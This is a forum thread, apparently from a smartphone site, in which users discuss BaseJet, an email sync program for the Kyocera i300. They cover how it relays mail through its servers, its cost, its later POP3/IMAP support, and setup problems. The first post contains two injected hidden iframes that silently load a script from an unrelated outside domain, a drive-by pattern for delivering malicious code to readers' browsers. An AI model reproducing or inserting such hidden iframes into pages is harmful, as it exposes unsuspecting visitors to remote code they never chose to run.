+ Reply to Thread

BaseJet eMail on i300

The Base Jet email software claims to be specifically designed for the i300. Its just out and I have not tried it yet. Here is the link:

BaseJet<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

smartphonecentral.com

Unhappy No direct POP3/SMTP

The thing I liked most about BaseJet was the two-line list display for each message. A full-length subject line is really lacking from three-column viewers like Eudora.

I ended up abandoning it because it didn't provide direct POP3/SMTP support. Could only do it through Outlook, which I don't use.

A nice looking program. If it adds direct messaging, rather than just through sync mode, I'll look at it again.

HTH!

overall pretty lousy

I use Outlook and gave this app a try. Here are my impressions.

The way it works wirelessly with your I300 is that it connects to a BaseJet web server to download your email. A "BaseJet Launcher" component sits on your desktop machine, checking Microsoft Outlook for new email, then it seems to send a copy of your email to the BaseJet servers for your phone to download.

It's "always on" as in the Launcher sends an email to your cell phone's @messaging.sprintpcs.com email address, giving you a wireless web alert that something new has come in, then you can manually syncronize.

I find this piece of software objectionable as it:
    1. Requires the Launcher be running on your desktop machine + Outlook to be running for it to work in the first place
    2. Sends your email through BaseJet's servers. Who knows what they're doing to your email, or worse, for a corporate environment, what sensitive information they have access to.
    3. Uses up your wireless web alerts for notifying you of new messages. *Anyone* with Microsoft Outlook can set up more useful filters that would automatically forward a copy of your message to your @messaging email address. It doesn't even give you the text of what your email is! Just a worthless notification

For $60, i think this piece of software isn't worth the money.

Good points though:
    - The email client on the palm side is very pretty and usable. If it had direct POP3 & SMTP support, i'd consider it
    - If you're working on a corporate environment which would support it's own BaseJet server, this might be somewhat usable
    - If you're using MS Exchange server, this may be one of the few ways to obtain your email on your phone.

Overall, I don't recommend an individual user to use this application. If you have a POP3/SMTP email system, use MultiMail, Eudora or mMail+ to simply download your email

Basejet - real-time (a la Blackberry) email on the I300!

Hi!

A couple of days ago, someone here hinted at a neat little program called Basejet which would do real-time email synchronization for you ... keeping your handheld Inbox constantly in sync with your desktop inbox.

A few days ago I started testing this program, and I'm happy to report that it delivers on this promise. You can have any new messages that appear in your inbox automatically synchronized with your I300 wirelessly. Here's how it works....

1. You install a desktop agent that hooks into Outlook, and watches your mail for you. Every "x" minutes, it will check to see if you have any new messages waiting.

2. If you have a message waiting, it will automatically send a special text page to your I300.

3. The Palm-based application keeps a constant watch over the text page database on the I300. If it sees that a message has come in since the last time it checked, that means there's new email to be downloaded. So, it automatically triggers a wireless sync, which initiates a data call and then downloads the new messages (via the Basejet server, which acts as an intermediary for the entire process).

That's it. Basically, it's as close to real-time sync as we'll ever get until 3G comes out (which, BTW, our beloved little I300 won't support anyway).

It works very well. The only real gotcha on the I300 is that you must uncheck the "Message Popup" in the preferences for the phone.

The only downside? The cost necessary to really use a program like this. But that's not the app developer's fault, it's the fault of the carriers. You may want to increase the number of text messages allocated to your plan if you really intend to use this app. If it's checking for mail every 15 minutes, thats 4 times per hour. At 8 hours per day (assuming you set it to only sync your I300 during business hours) that's a possibility that you would end up using 32 text messages in a single day (assuming you had new email at each pass). Plus, the time allocated to call and do a wireless sync 32 times throughout the day.

But it has great potential! Give it a look over at http://www.basejet.com.

BaseJet now updated for POP3

Hi!

BaseJet - which I already really liked - has just gotten better. It now has native POP3/IMAP support. So, you don't need to be running outlook to use it. Just point it at your POP3/IMAP server address, and it will log in on a regular message, and sync any new emails to your I300 automatically - as often as you'd like!!

Awesome!

-Doug

Yes, new version works great. Not sure how useful it'll be since it's fairly easy to set filters to forward to the phone, but it's nice to see such an app in development.

Filters

What do you mean, setting filters? Do you mean having your desktop email app forward certain messages to xxxxxxxxxx@messaging.sprintpcs.com? Well, the primary problem with that is the 160 character message limit with text pages ... you can't really get much of the email if you're using that method. Basejet makes sure that you have the whole message.

Plus, there's replying. Any replies you write get synced to your desktop Outbox, and then sent from there.

I'm having a good time with it so far ....

You're right with what you say about limitations on filters, but using filters in combination with an email client such as Eudora accomplishes much of what Basejet does, except it's a manual process. It helps that I run my own mail domain and can automatically bounce messages between and to multiple accounts at the server based on content. I'm certain I could accomplish the same thing with just about any POP account though. In my case, I'm not sure the eventual cost of Basejet combined with the cost of many Sprint web messages is justified when I can accomplish the same thing manually. Like I said earlier, it is a slick program and addresses some of the shortcomings of the i300.

BaseJet setup

I'm having trouble setting basejet up. I'm using yahoo mail, I keep on getting the message to configure the transporter. I've done that and it still does not work.

thanks

Nice Interface

I liekthe look of the interface (two line messages). Will this software work as a stand alone POP e-mail interface (without the messaging to the Sprint Accoutn?)
    I love my wife and my I300...don't make me choose.